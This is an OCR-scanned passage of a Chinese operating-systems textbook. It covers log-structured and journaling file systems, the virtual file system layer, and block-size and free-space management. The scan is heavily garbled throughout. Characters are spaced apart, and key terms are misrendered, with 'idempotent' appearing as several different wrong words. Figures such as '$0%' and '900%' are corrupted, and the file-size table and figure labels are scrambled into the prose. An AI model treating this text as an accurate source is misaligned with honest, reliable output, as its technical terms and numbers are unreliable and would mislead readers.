段 ， 在 日 志 的 末尾 处 写 和 磁盘。 要 打开 一 个 文件 ， 则 首先 需要 从 i 节 点 图 中 找到 文件 的 i 节 点 。 一 日 i 节 点 
定位 之 后 就 可 以 找到 相应 的 块 的 地 址 。 所 有 的 块 都 放 在 段 中 ， 在 日 志 的 某 个 位 置 上 。 

如 果 磁 盘 空 间 无 限 大 ， 那 么 有 了 前 面 的 讨论 就 吓 够 了 。 但 是 ， 实 际 的 硬盘 空间 是 有 限 的 ， 这 样 最 终 
日 志 将 会 占用 整个 磁盘 ， 到 那个 时 候 将 不 能 往日 志 中 写 任何 新 的 段 。 幸 运 的 是 ， 许 多 已 有 的 段 包含 了 很 
多 不 再 需要 的 块 ， 例 如 ， 如 果 一 个 文件 被 材 盖 了 ， 那 么 它 的 i 节 点 就 会 指向 新 的 块 ， 但 是 旧 的 磁盘 块 仍 
然 在 先前 写 人 的 段 中 占据 着 空间 。 

为 了 解决 这 个 问题 ，LES 有 一 个 清理 线程 ， 该 清理 线程 周期 地 扫描 日 志 进 行 磁盘 压缩 。 该 线程 首先 读 
日 志 中 的 第 一 个 段 的 摘要 ， 检 查 有 哪些 i 节 点 和 文件 。 然 后 该 线程 查看 当前 i 节 点 图 ， 判 断 该 i 节 点 是 否 有 效 
以 及 文件 块 是 否 仍 在 使 有 中。 如 果 没 有 使 用 ， 则 该 信息 被 丢弃 。 如 果 仍然 使 用 ， 那 么 i 节 点 和 块 就 进入 内 
存 等 待 写 同 到 下 一 个 段 中 。 接 着 ， 原 来 的 段 被 标记 为 空闲 ， 以 便 日 志 可 以 用 它 来 存放 新 的 数据 。 用 这 种 
方法 ， 清 理 线程 遍历 日 志 ， 从 后 面 移 走 旧 的 段 ， 然 后 将 有 效 的 数据 放 入 内 存 等 待 写 到 下 一 个 段 中 。 由 此 ， 
整个 磁 鼻 成 为 一 个 大 的 环形 的 缓冲 区 ， 写 线程 将 新 的 段 写 到 前 面 ， 而 清理 线程 则 将 旧 的 段 从 后 面 移 走 。 

日 志 的 管理 并 不 简单 ， 因 为 当 一 个 文件 块 被 写 回 到 一 个 新 段 的 时 候 ， 该 文件 的 i 节 点 (在 日 志 的 某 
个 地 方 ) 必须 首先 要 定位 更新， 然后 放 到 内 存 中 准备 写 回 到 下 一 个 段 中 。i 节 点 图 接着 必须 更 新 以 指 
向 新 的 位 置 。 尽 管 如 此 ， 对 日 志 进 行 管理 还 是 可 行 的 ， 而 且 性 能 分 析 的 结果 表明 ， 这 种 由 管理 而 带 来 的 
复杂 性 是 值得 的 。 在 上 面 所 引用 文章 中 的 测试 数据 表明 ，LFS 在 处 理 大 量 的 零碎 的 写 操作 时 性 能 上 优 于 
UNIX， 而 在 读 和 大 块 写 操作 的 性 能 方面 并 不 比 UNIX 文 件 系统 差 ， 甚 至 更 好 。 


4.3.6 日 志文 件 系统 

虽然 基于 日 志 结 构 的 文件 系统 是 一 个 很 吸引 人 的 想法 ， 但 是 由 于 它们 和 现 有 的 文件 系统 不 相 匹配 ， 
所 以 还 没有 被 广泛 应 用 。 尽 管 如 此 ， 它 们 内 在 的 一 个 思想 ， 即 面 对 出 错 的 鲁 梯 性 ， 却 可 以 被 其 他 文件 系 
统 所 借鉴 。 这 里 的 基本 想法 是 保存 一 个 用 于 记录 系统 下 一 步 将 要 做 什么 的 日 志 。 这 样 当 系统 在 完成 它们 
即将 完成 的 任务 前 崩溃 时 ， 重 新 启动 后 ， 可 以 通过 查看 日 志 ， 获 取 崩 涡 前 计划 完成 的 任务 ， 并 完成 它们 。 
这 样 的 文件 系统 被 称 为 日 志文 件 系统 ， 并 已 经 被 实际 应 用 。 微 软 (Microsoft) 的 NTFS 文 件 系统 、Linux 
ext3 和 ReiserFS 文 件 系统 都 使 用 日 志 。 接 下 来 ， 我 们 会 对 这 个 话题 进行 简短 介绍 。 

为 了 看 清 这 个 问题 的 实质 ， 考 虚 一 个 简单 、 普 通 并 经 常 发 生 的 操作 移 除 文件 。 这 个 操作 (在 
UNIX 中 ) 需要 三 个 步 受 完成 : 

1) 在 目录 中 删除 文件 ， 

D 释放 i 节点 到 空闲 节点 池 ， 

3) 将 所 有 磁盘 块 归还 空闲 磁盘 块 池 。 
在 Windows 中 ， 也 需要 类 似 的 步 又 。 不 存在 系统 崩溃 时 ， 这 些 步骤 执行 的 顺序 不 会 带 来 问题 ， 但 是 当 存 
在 系统 崩溃 时 ， 就 会 带 来 问题 。 假 如 在 第 一 步 完成 后 系统 崩溃 。 i 节点 和 文件 块 将 不 会 被 任何 文件 获得 ， 
也 不 会 被 再 分 配 ， 它 们 只 存在 于 废物 池 中 的 某 个 地 方 ， 并 因此 减少 了 可 利用 的 资源 。 如 果 贿 溃 发 生 在 第 
二 步 后 ， 那 么 只 有 磁盘 块 会 丢失 。 

如 果 操 作 顺序 被 更 改 ， 并 且 i 节 点 最 先 被 释放 ， 这 样 在 系统 重启 后 ，i 节 点 可 以 被 再 分 配 ， 但 是 旧 的 
目录 入 口 将 继续 指向 它 ， 因 此 指向 错误 文件 。 如 果 磁 盘 块 最 先 被 释放 ， 这 样 一 个 在 i 节 点 被 清除 前 的 系 
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统 崩溃 将 意味 着 一 个 有 效 的 目录 入 口 指向 一 个 i 节 点 ， 它 所 列 出 的 磁盘 块 当前 存在 于 空 闪 块 存储 池 中 并 
可 能 很 快 被 再 利用 。 这 将 导致 两 个 或 更 多 的 文件 分 享 同 样 的 磁盘 块 。 这 样 的 结果 都 是 不 好 的 。 

日 志文 件 系统 则 先 写 一 个 日 志 项 ， 列 出 三 个 将 要 完成 的 动作 。 然 后 日 志 项 被 写 人 磁盘 (并 且 为 了 良 
好 地 实施 ， 可 能 从 磁盘 读 回来 验证 它 的 完整 性 )。 只 有 当日 志 项 已 经 被 写 人 ， 不 同 的 操作 才 可 以 进行 。 
当 所 有 的 操作 成 功 完成 后 ， 控 除 日 志 项 。 如 果 系 统 这 时 崩溃 ， 系 统 恢复 后 ， 文件 系统 可 以 通过 检查 日 志 
来 查看 是 不 是 有 未 完成 的 操作 。 如 果 有 ， 可 以 重新 运行 所 有 未 完成 的 操作 (这 个 过 程 在 系统 崩溃 重复 发 
生 时 执行 多 次 )， 直 到 文件 被 正确 地 删除 。 

为 了 让 日 志文 件 系统 工作 ， 被 写 入 日 志 的 操作 必须 是 每 等 的 ， 它 意味 着 只 要 有 必要 ， 它 们 就 可 以 重 
复 执行 很 多 次 ， 并 不 会 带 来 破坏 。 像 操作 “更 新 位 表 并 标记 i 节点 或 者 块 4 是 空闲 的 ” 可 以 重复 任意 次 。 
同样 地 ， 查 找 一 个 目录 并 且 删 除 所 有 叫 foobar 的 项 也 是 冠 等 的 。 在 另 一 方面 ， 把 从 i 节 点 k 新 释放 的 块 加 
入 空闲 表 的 末端 不 是 特等 的 ， 因 为 它们 可 能 已 经 被 释放 并 存放 在 那里 了 。 更 复杂 的 操作 如 “查找 空闲 块 
列表 并 且 如 果 块 mn 不 在 列表 就 将 块 m 加 入 ”是 堵 等 的 。 日 志文 件 系统 必须 安排 它们 的 数据 结构 和 可 写 人 日 
志 的 操作 以 使 它们 都 是 老 等 的 。 在 这 些 条 件 下 ， 崩溃 恢复 可 以 被 快速 安全 地 实施 。 

为 了 增加 可 信 性 ， 一 个 文件 系统 可 以 引入 数据 库 中 原子 享 务 (atomic transaction) 的 概念 。 使 用 这 
个 概念 ， 一 组 动作 可 以 被 界定 在 开始 事务 和 结束 事务 操作 之 间 。 这 样 ， 文 件 系统 就 会 知道 它 必 须 完成 所 
有 被 界定 的 操作 ， 或 者 什么 也 不 做 ， 但 是 没有 其 他 的 选择 。 

NTFS 有 一 个 扩展 的 日 志文 件 系统 ， 并 且 它 的 结构 几乎 不 会 因 系统 崩溃 而 受到 破坏 。 自 1993 年 NTFS 
第 一 次 随 Windows NT 一 起 发 行 以 来 就 在 不 断 地 发 展 。 Linux 上 有 日 志 功 能 的 第 一 个 文件 系统 是 ReiserFS ， 
但 是 因为 它 和 后 来 标准 化 的 ext2 文 件 系统 不 相 匹配 ， 它 的 推广 受到 阻碍 。 相 比 之 下 ，ext3 一 一 一 个 不 像 
ReiserFS 那 么 有 野心 的 工程 ， 也 具有 日 志文 件 功能 并 且 和 之 前 的 ext2 系 统 可 以 共存 。 


4.3.7 虚拟 文件 系统 

即使 在 同一 台 计算 机 上 同一 个 操作 系统 下 ， 也 会 使 用 很 多 不 同 的 文件 系统 。 一 个 Windows 可 能 有 一 
个 主要 的 NTFS 文 件 系统 ， 但 是 也 有 继承 的 FAT-32 或 者 FAT-16 驱 动 ， 或 包含 旧 的 但 仍 被 使 用 的 数据 的 分 
区 ， 并 且 不 时 地 也 可 能 需要 一 个 CD-ROM 或 者 DVD (每 一 个 包含 它们 特有 的 文件 系统 )。Windows 通 过 
指定 不 同 的 盘 符 来 处 理 这 些 不 同 的 文件 系统 ， 比 如 “C:"、“D:” 等 。 当 一 个 进程 打开 一 个 文件 ， 盘 符 是 
显 式 或 者 隐 式 存在 的 ， 所 以 Windows 知 道 向 哪个 文件 系统 传递 请 求 ， 不 需要 尝试 将 不 同类 型 文件 系统 整 
合 为 统一 模式 。 

相 比 之 下 ， 所 有 现代 的 UNIX 系 统 做 了 一 个 很 认真 的 尝试 ， 即将 多 种 文件 系统 整合 到 一 个 统一 的 结 
构 中 。 一 个 Linux 系 统 可 以 用 ext2 作 为 根 文件 系统 ， ext3 分 区 装载 在 /home 下 ， 另 一 块 采 用 ReiserFS 文 件 
系统 的 硬盘 装载 在 home 下 ， 以 及 一 个 ISO 9660 的 CD-ROM 临 时 装载 在 ,mnt 下 。 从 用 户 的 观点 来 看 ， 那 
只 有 一 个 文件 系统 层级 。 它 们 事实 上 是 多 种 (不 相 容 的 ) 文件 系统 ， 对 于 用 户 和 进程 是 不 可 见 的 。 

但 是 ， 多 种 文件 系统 的 存在 ， 在 实际 应 用 中 是 明确 可 见 的 ， 而 且 因为 先前 Sun 公 司 (Kleiman, 1986) 
所 做 的 工作 ， 绝 大 多 数 UNIX 操 作 系统 都 使 
用 虚拟 文件 系统 (Virtual File System，VFS) 。 用 户 进程 一 
概念 尝试 将 多 种 文件 系统 统一 成 一 个 有 序 的 POSIX 
框架 。 关 键 的 思想 就 是 抽象 出 所 有 文件 系统 
都 共有 的 部 分 ， 并 且 将 这 部 分 代码 放 在 单独 
的 一 层 ， 该 层 调用 底层 的 实际 文件 系统 来 具 ”文件 系统 一 | 
体 管理 数据 。 大 体 上 的 结构 在 图 4-18 中 有 闸 
述 。 以 下 的 介绍 不 是 单独 针对 Linux 和 
FreeBSD 或 者 其 他 版 本 的 UNIX， 而 是 给 出 
了 一 种 普遍 的 关于 UNIX 下 文件 系统 的 描述 。 тез юзага 

所 有 和 文件 相关 的 系统 调用 在 最 初 的 处 理 上 都 指向 虚拟 文件 系统 。 这 些 来 自用 户 进程 的 调用 ， 都 是 
标准 的 POSIX 系 统 调用 ， 比 如 open、read write 和 lseek 等 。 因此 ， 虚 拟 文件 系统 对 用 户 进程 有 一 个 “更 
高 层 “ 接 口 ， 它 就 是 著名 的 POSIX 接 口 。 
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VFS 也 有 一 个 对 于 实际 文件 系统 的 “更 低层 ”接口 ， 就 是 在 图 4-18 中 被 标记 为 VFS 接 口 的 部 分 。 这 
个 接口 包含 许多 功能 调用 ， 这 样 VFS 可 以 使 每 一 个 文件 系统 完成 任务 。 因 此 ， 当 创造 一 个 新 的 文件 系统 
和 VFS 一 起 工作 时 ， 新 文件 系统 的 设计 者 就 必须 确定 它 提供 VFS 所 需要 的 功能 调用 。 关 于 这 个 功能 的 一 
个 明显 的 例子 就 是 从 磁盘 中 读 某 个 特定 的 块 ， 把 它 放 在 文件 系统 的 高 速 缓冲 中 , 并 且 返 回 指向 它 的 指针 。 
因此 ，VEFS 有 两 个 不 同 的 接口 : 上 层 给 用 户 进程 的 接口 和 下 层 给 实际 文件 系统 的 接口 。 

尽管 VFS 下 大 多 数 的 文件 系统 体现 了 本 地 磁盘 的 划分 但 并 不 总 是 这 样 。 事 实 上 ，Sun 建 立 虚 拟 文 
件 系统 最 原始 的 动机 是 支持 使 用 NFS (Network File System， 网 络 文件 系统 ) 协议 的 远程 文件 系统 。 
VFS 设 计 是 只 要 实际 的 文件 系统 提供 VFS 需 要 的 功能 ，VFS 就 不 需 知道 或 者 关心 数据 具体 存储 在 什么 地 
方 或 者 底层 的 文件 系统 是 什么 样 的 。 

大 多 数 VFS 应 用 本 质 上 都 是 面向 对 象 的 ， 即 便 它 们 用 C 语 言 而 不 是 C++ 编写 。 有 几 种 通常 支持 的 主 
要 的 对 象 类 型 ， 包 括 超 块 (描述 文件 系统 )、v 节 点 (描述 文件 ) 和 目录 (描述 文件 系统 目录 )。 这 些 中 
的 每 一 个 都 有 实际 文件 系统 必须 支持 的 相关 操作 。 另 外 ，VFS 有 一 些 供 它 自己 使 用 的 内 部 数据 结构 ， 包 
括 用 于 跟踪 用 户 进程 中 所 有 打开 文件 的 装载 表 和 文件 描述 符 的 数组 。 

为 了 理解 VFS 是 如 何 工作 的 ， 让 我 们 按时 间 的 先后 举 一 个 例子 。 当 系统 启动 时 ， 根 文件 系统 在 VFS 
中 注册 。 另 外 ， 当 装载 其 他 文件 系统 时 ， 不 管 在 启动 时 还 是 在 操作 过 程 中 ， 它 们 也 必须 在 VFS 中 注册 。 
当 一 个 文件 系统 注册 时 ， 它 做 的 最 基本 的 工作 就 是 提供 一 个 包含 VFS 所 需要 的 函数 地 址 的 列表 ， 可 以 是 
一 个 长 的 调用 矢量 ( 表 )， 或 者 是 许多 这 样 的 矢量 (如果 VFS 需 要 )， 每 个 VFS 对 象 一 个 。 因 此 ， 只 要 一 
个 文件 系统 在 VFS 注 册 ， VFS 就 知道 如 何 从 它 那里 读 一 个 块 一 一 它 从 文件 系统 提供 的 矢量 中 直接 调用 第 4 
个 (或 者 任何 一 个 ) 功能 。 同 样 地 ，VFS 也 知道 如 何 执行 实际 文件 系统 提供 的 每 一 个 其 他 的 功能 ， 它 只 
需 调 用 某 个 功能 ， 该 功能 所 在 的 地 址 在 文件 系统 注册 时 就 提供 了 。 

装载 文件 系统 后 就 可 以 使 用 它 了 。 比 如 ， 如 果 一 个 文件 系统 装载 在 /usr 并 且 一 个 进程 调用 它 ， 

open("/usr/include/unistd.h", O_RDONLY) 


当 解析 路 径 时 ，VFS 看 到 新 的 文件 系统 被 装载 在 /usr， 并 且 通 过 搜索 已 经 装载 文件 的 超 块 表 来 确定 它 的 
超 块 。 做 完 这 些 ， 它 可 以 找到 它 所 装载 的 文件 的 根 目录 ， 在 那里 查找 路 径 include/unistd.h。 然 后 VFS 创 
建 一 个 v 节 点 并 调用 实际 文件 系统 ， 以 返回 所 有 的 在 文件 i 节点 中 的 信息 。 这 个 信息 被 和 其 他 信息 一 起 复 
制 到 v 节 点 中 (在 RAM 中 )， 而 这 些 信息 中 最 重要 的 是 指向 包含 调用 v 节 点 操作 的 功能 表 的 指针 ， 比 如 
read、write 和 close 等 。 

当 v 节 点 被 创建 以 后 ，VFS 在 文件 描述 符 表 中 为 调用 进程 创建 一 个 人 口 ， 并 且 将 它 指向 一 个 新 的 v 节 
点 (为 了 简单 ， 文 件 描述 符 实际 上 指向 另 一 个 包含 当前 文件 位 置 和 指向 v 节 点 的 指针 的 数据 结构 ， 但 是 
这 个 细节 对 于 我 们 这 里 的 陈述 并 不 重要 )。 最 后 ，VFS 向 调用 者 返回 文件 描述 符 ， 所 以 调用 者 可 以 用 它 
去 读 、 写 或 者 关闭 文件 。 

随后 ， 当 进程 用 文件 描述 符 进行 一 个 读 操作 ，VFS 通 过 进程 表 和 文件 描述 符 表 确定 v 节 点 的 位 置 ， 
并 跟随 指针 指向 功能 表 (所 有 这 些 都 是 被 请 求 文件 所 在 的 实际 文件 系统 中 的 地 址 )。 这 样 就 调用 了 处 理 
read 的 功能 ， 在 实际 文件 系统 中 的 代码 运行 并 得 到 所 请 求 的 块 。VFS 并 不 知道 数据 是 来 源 于 本 地 硬盘 ， 
还 是 来 源 于 网 络 中 的 远程 文件 系统 、CD-ROM、USB 存 储 棒 或 者 其 他 介质 。 所 有 有 关 的 数据 结构 在 图 
4-19 中 展示 。 从 调用 者 进程 号 和 文件 描述 符 开始 ， 进 而 是 v 节 点 ， 读 功能 指针 ， 然 后 是 对 实际 文件 系统 
的 入 口 函 数 定位 。 

通过 这 种 方法 ， 加 入 新 的 文件 系统 变 得 相当 直接 。 为 了 加 入 一 个 文件 系统 ， 设 计 者 首先 获得 一 
个 VFS 期 待 的 功能 调用 的 列表 ， 然 后 编写 文件 系统 实现 这 些 功能 。 或者， 如果 文件 系统 已 经 存在 ， 
它们 必须 提供 VFS 需 要 的 包装 功能 ， 通 常 通 过 建造 一 个 或 者 多 个 内 在 的 指向 实际 文件 系统 的 调用 来 
实现 。 
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< 一 一 一 从 VFS 调 用 
FS 


读 功能 


图 4-19 VFS 和 实际 文件 系统 进行 读 操作 所 使 用 的 数据 结构 和 代码 的 简化 视图 


4.4 文件 系统 管理 和 优化 


要 使 文件 系统 工作 是 一 件 事 ， 使 真实 世界 中 的 文件 系统 有 效 、 重 棒 地 工作 是 另 一 回 事 。 本 节 中 ,我 
们 将 考察 有 关 管理 磁盘 的 一 些 问题 。 


441 磁盘 空间 管理 

文件 通常 存放 在 磁盘 上 ， 所 以 对 磁盘 空间 的 管理 是 系统 设计 者 要 考虑 的 一 个 主要 问题 。 存 储 n 个 字 
节 的 文件 可 以 有 两 种 策略 : 分 配 mn 个 字 节 的 连续 磁盘 空间 ， 或 者 把 文件 分 成 很 多 个 连续 (或 并 不 一 定 连 
Ж) 的 块 。 在 存储 管理 系统 中 ， 分 段 处 理 和 分 页 处 理 之 间 也 要 进行 同样 的 权衡 。 

正如 我 们 已 经 见 到 的 ， 按 连续 字 节 序列 存储 文件 有 一 个 明显 问题 ， 当 文件 扩大 时 ， 有 可 能 需要 在 磁 
盘 上 移动 文件 。 内 存 中 分 段 也 有 同样 的 问题 。 不 同 的 是 ， 相 对 于 把 文件 从 磁盘 的 一 个 位 置 移动 到 另 一 个 
位 置 ， 内 存 中 段 的 移动 操作 要 快 得 多 。 因 此 ， 几 乎 所 有 的 文件 系统 都 把 文件 分 割 成 固定 大 小 的 块 来 存储 ， 
各 块 之 间 不 一 定 相 邻 。 

1. 块 大 小 

一 旦 决定 把 文件 按 固 定 大 小 的 块 来 存储 ， 就 会 出 现 一 个 问题 : 块 的 大 小 应 该 是 多 少 ?按照 磁盘 组 织 
方式 ， 扇 区 、 磁 道 和 柱 面 显然 都 可 以 作为 分 配 单位 (虽然 它们 都 与 设备 相关 ， 这 是 一 种 负面 因素 ) 。 在 
分 页 系统 中 ， 页 面 大 小 也 是 主要 讨论 的 问题 之 一 。 

拥有 大 的 块 尺寸 意味 着 每 个 文件 ， 甚 至 一 个 ! 字 节 的 文件 ， 都 要 占用 一 整个 柱 面 ， 也 就 是 说 小 的 文 
件 浪费 了 大 量 的 磁盘 空间 。 另 一 方面 ， 小 的 块 尺寸 意味 着 大 多 数 文件 会 跨越 多 个 块 ， 因 此 需要 多 次 寻 道 
与 旋转 延迟 才能 读 出 它们 ， 从 而 降低 了 性 能 。 因 此 ， 如 果 分 配 的 单元 太 大 ， 则 浪费 了 空间 ， 如 果 太 小 
则 浪费 时 间 。 

做 出 一 个 好 的 决策 需要 知道 有 关 文件 大 小 分 配 的 信息 。Tanenbaum 等 人 (2006) 给 出 了 1984 年 及 
2005 年 在 一 所 大 型 研究 型 大 学 (VU) 的 计算 机 系 以 及 一 个 政治 网 站 (www.electoral-vote.com) 的 商业 
网 络 服务 器 上 研究 的 文件 大 小 分 配 数据 。 结 果 显示 在 图 4-20， 其 中 ， 对 于 每 个 2 的 宪 文 件 大 小 ， 在 3 个 数 
据 集 里 每 一 数据 集中 的 所 有 小 于 等 于 这 个 值 的 文件 所 占 的 百分比 被 列 了 出 来 。 例 如 ， 在 2005 年 ，59.13% 
的 VU 的 文件 是 4KB 或 更 小 ， 且 90.84% 的 文件 是 64KB 或 更 小 ， 其 文件 大 小 的 中 间 值 是 2475 字 区 。 一 些 人 
可 能 会 因为 这 么 小 的 尺寸 而 感到 吃惊 。 
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文件 大 小 | vu 1984 | VU 2005 | Web | [文件 大 小 | VU 1984 | уи 2005 | web 
1 1.79 1.38 6.67 16 KB Я 92.53 78.92 86.79 | 
2 188 153 | 767 32KB | 9721| в587 | 9165 
4 2.01 1.65 8.33 64 КВ 99.18 90.84 94.80 
Г 8 2.31 1.80 | 11.30 128 KB 99.84 | 93.73 96.93 
16 332 215 | 1146 | | 256KB | 9996| 96.12 | 98.48 
32 513 3.15 | 1233 512KB | 10000 | 97.73 | 9899 
64 8.71 4.98 | 26.10 1MB 100.00 98.87 | бе 99.62 
128 14.73 8.03 | 28.49 2MB 100.00 99.44 99.80 
256 Е 23.09 13.29 | 32.10 4MB 100.00 99.71_ 99.87 | 
512 34.44 | 20.62 | 39.94 | 8MB 100.00 99.86 99.94 
1KB 48.05 30.91 | 47.82 16 MB 100.00 99.94 99.97 
2кв | 6087| 46.09 | 59.44 32MB | 100.00 | 99.97 | 99.99 
4KB 75.31 | 59.13 70.64 | 64MB 100.00 99.99 99.99 
8KB 84.97 69.96 | 79.69 1 128 МВ 100.00 99.99 | 100.00 


图 4-20 小 于 某 个 给 定 值 (FH) 的 文件 的 百分比 


我 们 能 从 这 些 数据 中 得 出 什么 结论 昵 ? 如 果 块 大 小 是 IKB， 则 只 有 30%~50% 的 文件 能 够 放 在 一 个 
块 内 ,但 如 果 块 大 小 是 4KB， 这 一 比例 将 上 升 到 60%~70%。 那 篇 论文 中 的 其 他 数据 显示 ， 如 果 块 大 小 是 
4KB， 则 93% 的 磁盘 块 会 被 10% 最 大 的 文件 使 用 。 这 意味 着 在 每 个 小 文件 末尾 浪费 一 些 空间 几乎 不 会 有 
任何 关系 ， 因 为 磁盘 被 少量 的 大 文件 (视频 ) 给 占用 了 ， 并 且 小 文件 所 占 空间 的 总 量 根本 就 无 关 紧 要 ， 
甚至 将 那 900% 最 小 的 文件 所 占 的 空间 翻 一 倍 也 不 会 引 人 注目 。 

另 一 方面 , 分 配 单位 很 小 意味 着 每 个 文件 由 很 多 块 组 成 ， 每 读 一 块 都 有 寻 道 和 旋转 延迟 时 间 ， 所 以 ， 
读 取 由 很 多 小 块 组 成 的 文件 会 非常 慢 。 

举例 说 明 ， 假 设 磁盘 每 道 有 1MB， 其 旋转 时 间 为 8.33ms， 平 均 寻 道 时 间 为 Sms。 以 毫秒 (ms) 为 单 
位 ， 读 取 一 个 k 个 字 节 的 块 所 需要 的 时 间 是 寻 道 时 间 、 旋转 延迟 和 传送 时 间 之 和 : 

5+ 4.165 + (К/ 1 000 000) x 8.33 


图 4-21 的 虚线 表示 一 个 磁盘 的 数据 率 与 块 
大 小 之 间 的 函数 关系 。 要 计算 空间 利用 率 ， 则 
要 对 文件 的 平均 大 小 做 出 假设 。 为 简单 起 见 ， 
假设 所 有 文件 都 是 4KB。 尽 管 这 个 数据 稍微 大 于 
在 YU 测量 得 到 的 数据 ， 但 是 学 生 们 大 概 应 该 有 
比 公司 数据 中 心 更 小 的 文件 ， 所 以 这 样 整体 上 
也 许 更 好 些 。 图 4-21 中 的 实 线 表示 作为 盘 块 大 小 
函数 的 空间 利用 率 。 

可 以 按 下 面 的 方式 理解 这 两 条 曲线 。 对 一 I 
个 块 的 访问 时 间 完 全 由 寻 道 时 间 和 旋转 延迟 所 图 4-21 虚线 (左边 标 度 ) 给 出 磁盘 数据 率 ， 实 线 ( 右 
决定 ， 所 以 者 要 花费 9ms 的 代价 访问 一 个 盘 块 ，。 зууд) 给 出 丰 盘 空间 利用 率 《 所 有 文件 大 小 均 为 4KB) 
那么 取 的 数据 越 多 越 好 。 因 此 ， 数 据 率 随 着 磁 
ARKTA (直到 传输 花费 很 长 的 时 间 以 至 于 传输 时 间 成 为 主导 因素 ) 。 

现在 考虑 空间 利用 率 。 对 于 4KB 文 件 和 1KB、2KB 或 4KB 的 磁盘 块 ， 分 别 使 用 4、2、1 块 的 文件 ， 
没有 浪费 。 对 于 8KB 块 以 及 4KB 文 件 ， 空 间 利用 率 降 至 $0%， 而 16KB 块 则 降 至 25%。 实 际 上 ， 很 少 有 文 
件 的 大 小 是 磁盘 块 整数 倍 的 ， 所 以 一 个 文件 的 最 后 一 个 磁盘 块 中 总 是 有 一 些 空间 浪费 。 

然而 ， 这 些 曲线 显示 出 性 能 与 空间 利用 率 天 生 就 是 矛盾 的 。 小 的 块 会 导致 低 的 性 能 但 是 高 的 空间 利 
用 率 。 对 于 这 些 数据 ， 不 存在 合理 的 折 中 方案 。 在 两 条 曲线 的 相交 处 的 大 小 大 约 是 64KB， 但 是 数据 
(传输 ) 速率 只 有 6.6MB/s 并 且 空间 利用 率 只 有 大 约 7% ， 两 者 都 不 是 很 好 。 从 历史 观点 上 来 说 ， 文 件 系 
统 将 大 小 设 在 1~4KB 之 间 ， 但 现在 随 着 磁盘 超过 了 1TB， 还 是 将 块 的 大 小 提升 到 64KB 并 且 接受 浪费 的 磁 
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盘 空 间 ， 这 样 也 许 更 好 。 磁 盘 空间 儿 乎 不 再 会 短缺 了 。 

在 考察 Windows NT 的 文件 使 用 情况 是 否 与 UNIX 的 文件 使 用 情况 存在 微小 差别 的 实验 中 ，Vogels 在 
康 奈 尔 大 学 对 文件 进行 了 测量 (Vogels，1999)。 他 观察 到 NT 的 文件 使 用 情况 比 UNIX 的 文件 使 用 情况 复 
杂 得 多 。 他 写 道 : 

当 我 们 在 notepad 文 本 编辑 器 中 输入 一 些 字符 后 ， 将 内 容 保存 到 一 个 文件 中 将 触发 26 个 系统 调用 ， 
包括 3 个 失败 的 open 企 图 、1 个 文件 重 写 和 4 个 打开 和 关闭 序列 。 
尽管 如 此 ， 他 观察 到 了 文件 大 小 的 中 间 值 (以 使 用 情况 作为 权重 ) : 只 读 的 为 IKB ， 只 写 的 为 2.3KB， 
读 写 的 文件 为 4.2KB。 考 虑 到 数据 集 测量 技术 以 及 年 份 上 的 差异 ， 这 些 结果 与 VU 的 结果 是 相当 吻 
合 的 。 

2. 记录 空闲 块 

一 旦 选 定 了 块 大 小 ， 下 一 个 问题 就 是 怎样 跟踪 空闲 块 。 有 两 种 方法 被 广泛 采用 ， 如 图 4-22 所 示 。 第 
一 种 方法 是 采用 磁盘 块 链表 ， 每 个 块 中 包含 尽 可 能 多 的 空闲 磁盘 块 号 。 对 于 1KB 大 小 的 块 和 32 位 的 磁盘 
块 号 ， 空 闲 表 中 每 个 块 包含 有 255 个 空闲 块 的 块 号 (需要 有 一 个 位 置 存 放 指向 下 一 个 块 的 指针 )。 考 虑 


500GB 的 磁盘 ， 拥 有 488 х 10' 个 块 。 为 了 在 255 块 中 存放 全 部 这 些 地 址 ， 需 要 190 万 个 块 。 通 常情 况 下 ， 
采用 空闲 块 存放 空闲 表 ， 这 样 存储 器 基本 上 是 空 的 。 
空 亲 磁 盘 块 16. 17, 18 
Т 20 1 1001101101101100 
136 162 ЕЛ 0110110111101 | 
210 612 897 1010110110110110 
97 [зг 422 0110110110111017 
四 [29] 四 оттоон 
63 f 160 223 | 1101101010001111 
21 | вм 23 | 0000111011010111 
в [Гг 190 1011010110111 
262 ШЕ 126 ] tooiom mot | 
| 5 | 
БЫ Тр 
310 180 142 0111011101110111 
1 KB 的 磁盘 块 可 以 保存 位 图 
256 个 32 位 磁盘 块 号 由) D 


图 4-22 а) 把 空闲 表 存 放 在 链表 中 ，b) 位 图 


另 一 种 空闲 磁盘 空间 管理 的 方法 是 采用 位 图 。n 个 块 的 磁盘 需要 ”位 位 图 。 在 位 图 中 ， 空 闲 块 用 1 表 
示 ， 已 分 配 块 用 0 表示 (或 者 反之 ) 。 对 于 500GB 磁 盘 的 例子 ， 需 要 488 x 10* 位 表示 ， 即 需要 60 000 个 
1KB 块 存储 。 很 明显 ， 位 图 方法 所 需 空间 较 少 ， 因 为 每 块 只 用 一 个 二 进 制 位 标识 ， 相 反 在 链表 方法 中 ， 
每 一 块 要 用 到 32 位 。 只 有 在 磁盘 快 满 时 ( 即 几乎 没有 空 亲 块 时 ) 链表 方案 需要 的 块 才 比 位 图 少 。 

如 果 空 闲 块 倾向 于 成 为 一 个 长 的 连续 分 块 的 话 , 则 空闲 列表 系统 可 以 改 成 记录 分 块 而 不 是 单个 的 块 。 
一 个 8、16、32 位 的 计数 可 以 与 每 一 个 块 相关 联 ， 来 记录 连续 空 亲 块 的 数目 。 在 最 好 的 情况 下 ， 一 个 基 
本 上 空 的 磁盘 可 以 用 两 个 数 表达 : 第 一 个 空闲 块 的 地 址 ， 以 及 空闲 块 的 计数 。 另 一 方面 ， 如 果 磁 盘 产 生 
了 很 严重 的 碎片 ， 记 录 分 块 会 比 记录 单独 的 块 效率 要 低 ， 因 为 不 仅 要 存储 地 址 ， 而 且 还 要 存储 计数 。 

这 个 情形 说 明了 操作 系统 设计 者 经 常 遇 到 的 一 个 问题 。 有 许多 数据 结构 与 算法 可 以 用 来 解决 一 个 问 
题 ， 但 选择 其 中 最 好 的 则 需要 数据 ， 而 这 些 数据 是 设计 者 无 法 预先 拥有 的 ， 只 有 在 系统 被 部 署 完毕 并 被 
大 量 使 用 后 才 会 获得 。 更 有 其 者 ， 有 些 数 据 可 能 就 是 无 法 获取 。 例 如 ，1984 年 与 1995 年 我 们 在 VU 测量 
的 文件 大 小 、 网 站 的 数据 以 及 在 康 奈 尔 大 学 的 数据 ， 是 仅 有 的 4 个 数据 样本 。 尽管 有 总 比 什么 都 没有 好 ， 
